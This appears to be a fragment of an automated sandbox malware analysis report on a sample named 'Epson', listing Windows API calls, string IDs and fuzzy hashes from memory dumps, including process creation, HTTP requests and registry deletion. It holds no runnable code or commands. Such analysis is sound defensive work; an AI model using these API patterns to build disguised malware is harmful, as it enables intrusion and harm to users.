                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcslen
                                                                                                                                                                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                      • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                      • Opcode ID: f2c9e406e8f51c83ba82e5bd9772edc0d791a13d0e915a2ebcd4de20f93e02e5
                                                                                                                                                                                                                                      • Instruction ID: 0e7c6046ed19b210bca79e3943ed4e0f74a78104623e067273b6a6a08da789b4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2c9e406e8f51c83ba82e5bd9772edc0d791a13d0e915a2ebcd4de20f93e02e5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78E1F832E40516ABCB189FB6C8517EDFBB4BF54720F10811AE456F7250DB34AE89AF90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharLowerBuffW.USER32(00000000,00000000,00FEDCD0), ref: 00FC4F6C
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FC4F80
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FC4FDE
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FC5039
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FC5084
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FC50EC
                                                                                                                                                                                                                                        • Part of subcall function 00F6FD52: _wcslen.LIBCMT ref: 00F6FD5D
                                                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,01017C10,00000061), ref: 00FC5188
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                      • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                      • Opcode ID: 3d5bd471cb838e4b6e5b0322aa77fa37abc5fff7f31086b3a00edcea60bfc342
                                                                                                                                                                                                                                      • Instruction ID: c840b08e1c3c0d5cf5cb72f5b38abffb73550d3f33f301623a158f5d435222a3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d5bd471cb838e4b6e5b0322aa77fa37abc5fff7f31086b3a00edcea60bfc342
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06B10531A087039FC710DF28C992F6AB7E5BF94B20F54491DF596C7291D734E884EA92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FDBBF8
                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FDBC10
                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FDBC34
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FDBC60
                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FDBC74
                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FDBC96
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FDBD92
                                                                                                                                                                                                                                        • Part of subcall function 00FC0F4E: GetStdHandle.KERNEL32(000000F6), ref: 00FC0F6D
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FDBDAB
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FDBDC6
                                                                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FDBE16
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 00FDBE67
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00FDBE99
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00FDBEAA
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00FDBEBC
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00FDBECE
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00FDBF43
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2178637699-0
                                                                                                                                                                                                                                      • Opcode ID: dfc90271781b69586346db9ccf79e14e1dd7a0b4c4e8e9526644a8591ea640ef
                                                                                                                                                                                                                                      • Instruction ID: 4090e845a7d50b9ca3f960ea03f57bedb6ee9c0b485d37a6b79d9a38463b8de0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dfc90271781b69586346db9ccf79e14e1dd7a0b4c4e8e9526644a8591ea640ef
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9FF17E31A04340DFC715EF24C891B6ABBE2AF84324F19855EF9854B3A2CB75EC45EB52
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00FEDCD0), ref: 00FD4B18
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00FD4B2A
                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00FEDCD0), ref: 00FD4B4F
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00FEDCD0), ref: 00FD4B9B
                                                                                                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028,?,00FEDCD0), ref: 00FD4C05
                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000009), ref: 00FD4CBF
                                                                                                                                                                                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00FD4D25
                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00FD4D4F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 354098117-199464113
                                                                                                                                                                                                                                      • Opcode ID: 97d3c9b22e7fb6f3ae953b6ec6e4c428c6676e4592b9e55a8558cbba07a88dfd
                                                                                                                                                                                                                                      • Instruction ID: 9dcb5bb3df8635bd54f064d6dc8881429fe4befb868715ef2d0c916541c1decc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97d3c9b22e7fb6f3ae953b6ec6e4c428c6676e4592b9e55a8558cbba07a88dfd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E122A71A00109AFDB14DF54C888EAEBBB6FF85314F188099E9199F261D731FD46DBA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(010229C0), ref: 00F93F72
                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(010229C0), ref: 00F94022
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00F94066
                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00F9406F
                                                                                                                                                                                                                                      • TrackPopupMenuEx.USER32(010229C0,00000000,?,00000000,00000000,00000000), ref: 00F94082
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F9408E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                      • Opcode ID: 504b42264b58477b7bcc1b7c5783be6a42a215808380ec2c20d1178f2fc1c87b
                                                                                                                                                                                                                                      • Instruction ID: b29bf21a7b75b6d5475c0344f3e160ccc8310b2644c4f0c70ff0493e6213e835
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 504b42264b58477b7bcc1b7c5783be6a42a215808380ec2c20d1178f2fc1c87b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95710531A44215BEFB259F69DC89FAABF65FF04368F140206F6146A1E0C7B1A914EB90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000,?), ref: 00FE7823
                                                                                                                                                                                                                                        • Part of subcall function 00F58577: _wcslen.LIBCMT ref: 00F5858A
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00FE7897
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00FE78B9
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FE78CC
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00FE78ED
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F50000,00000000), ref: 00FE791C
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FE7935
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00FE794E
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00FE7955
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00FE796D
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00FE7985
                                                                                                                                                                                                                                        • Part of subcall function 00F52234: GetWindowLongW.USER32(?,000000EB), ref: 00F52242
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                      • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                      • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                      • Opcode ID: 4016fcec7c94191848506002fb0f0e8bfaaab9918099a7c807ae7156d4d21aeb
                                                                                                                                                                                                                                      • Instruction ID: e04fba2b878e18b1f9f45f8bbe76f645e66624132d6b9fd7ff0dd89ab19bee47
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4016fcec7c94191848506002fb0f0e8bfaaab9918099a7c807ae7156d4d21aeb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A719970508384AFE721EF59CC48F6ABBE9FF89310F14445EF9858B261C775A906EB11
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F5249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F524B0
                                                                                                                                                                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 00FE9BA3
                                                                                                                                                                                                                                        • Part of subcall function 00FE80AE: ClientToScreen.USER32(?,?), ref: 00FE80D4
                                                                                                                                                                                                                                        • Part of subcall function 00FE80AE: GetWindowRect.USER32(?,?), ref: 00FE814A
                                                                                                                                                                                                                                        • Part of subcall function 00FE80AE: PtInRect.USER32(?,?,?), ref: 00FE815A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00FE9C0C
                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00FE9C17
                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00FE9C3A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00FE9C81
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00FE9C9A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00FE9CB1
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00FE9CD3
                                                                                                                                                                                                                                      • DragFinish.SHELL32(?), ref: 00FE9CDA
                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00FE9DCD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                      • API String ID: 221274066-3440237614
                                                                                                                                                                                                                                      • Opcode ID: d124d5ed17ab38f833b6fed96442c59fa348ff391af8dee5f58d37e2f502958a
                                                                                                                                                                                                                                      • Instruction ID: 6f0ed96acbbaff9fffa69bf54c9be39ee20499b73409a4cf0e02b09b1108fb32
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d124d5ed17ab38f833b6fed96442c59fa348ff391af8dee5f58d37e2f502958a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29619971108345AFC301EF60CC85EAFBBE8FF88750F40091EFA91961A1DB749A09DB62
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00FCCEF5
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00FCCF08
                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00FCCF1C
                                                                                                                                                                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00FCCF35
                                                                                                                                                                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00FCCF78
                                                                                                                                                                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00FCCF8E
                                                                                                                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FCCF99
                                                                                                                                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00FCCFC9
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00FCD021
                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00FCD035
                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00FCD040
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                      • Opcode ID: 740c1144de30be108bc952ca0eb0bf63ae63962ebf99f19350529c5a3deb5be3
                                                                                                                                                                                                                                      • Instruction ID: 587bb466422e308a21254e55d47c15bf1362f14b3cd28dc42084ad3a1d85d2ba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 740c1144de30be108bc952ca0eb0bf63ae63962ebf99f19350529c5a3deb5be3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91515BB190060ABFDB219F64CE89FAA7BBCFB08754F00442EF9499A550D734D945FBA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00FE66D6,?,?), ref: 00FE8FEE
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00FE66D6,?,?,00000000,?), ref: 00FE8FFE
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00FE66D6,?,?,00000000,?), ref: 00FE9009
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00FE66D6,?,?,00000000,?), ref: 00FE9016
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00FE9024
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00FE66D6,?,?,00000000,?), ref: 00FE9033
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00FE903C
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00FE66D6,?,?,00000000,?), ref: 00FE9043
                                                                                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00FE66D6,?,?,00000000,?), ref: 00FE9054
                                                                                                                                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00FF0C04,?), ref: 00FE906D
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00FE907D
                                                                                                                                                                                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00FE909D
                                                                                                                                                                                                                                      • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00FE90CD
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00FE90F5
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00FE910B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3840717409-0
                                                                                                                                                                                                                                      • Opcode ID: d70a54cad92e8afee276791fc132f1c530d3bf3aad4573a2a6e271ba672620a7
                                                                                                                                                                                                                                      • Instruction ID: a68e1f8006239f2828e2eb6c069dd86e16b617909d529d4fd2629d6d440823ba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d70a54cad92e8afee276791fc132f1c530d3bf3aad4573a2a6e271ba672620a7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3413975600248FFDB11DF66DC88EAA7BB8FF89721F104059FA05DB260D7719941EB20
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F5B329: _wcslen.LIBCMT ref: 00F5B333
                                                                                                                                                                                                                                        • Part of subcall function 00FDD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FDC10E,?,?), ref: 00FDD415
                                                                                                                                                                                                                                        • Part of subcall function 00FDD3F8: _wcslen.LIBCMT ref: 00FDD451
                                                                                                                                                                                                                                        • Part of subcall function 00FDD3F8: _wcslen.LIBCMT ref: 00FDD4C8
                                                                                                                                                                                                                                        • Part of subcall function 00FDD3F8: _wcslen.LIBCMT ref: 00FDD4FE
                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FDC154
                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FDC1D2
                                                                                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 00FDC26A
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00FDC2DE
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00FDC2FC
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00FDC352
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00FDC364
                                                                                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00FDC382
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00FDC3E3
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00FDC3F4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                      • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                      • Opcode ID: 58acce133ab23aeabf624c4f5e5f63d0d7b9675416fdf017737932efef1c22d8
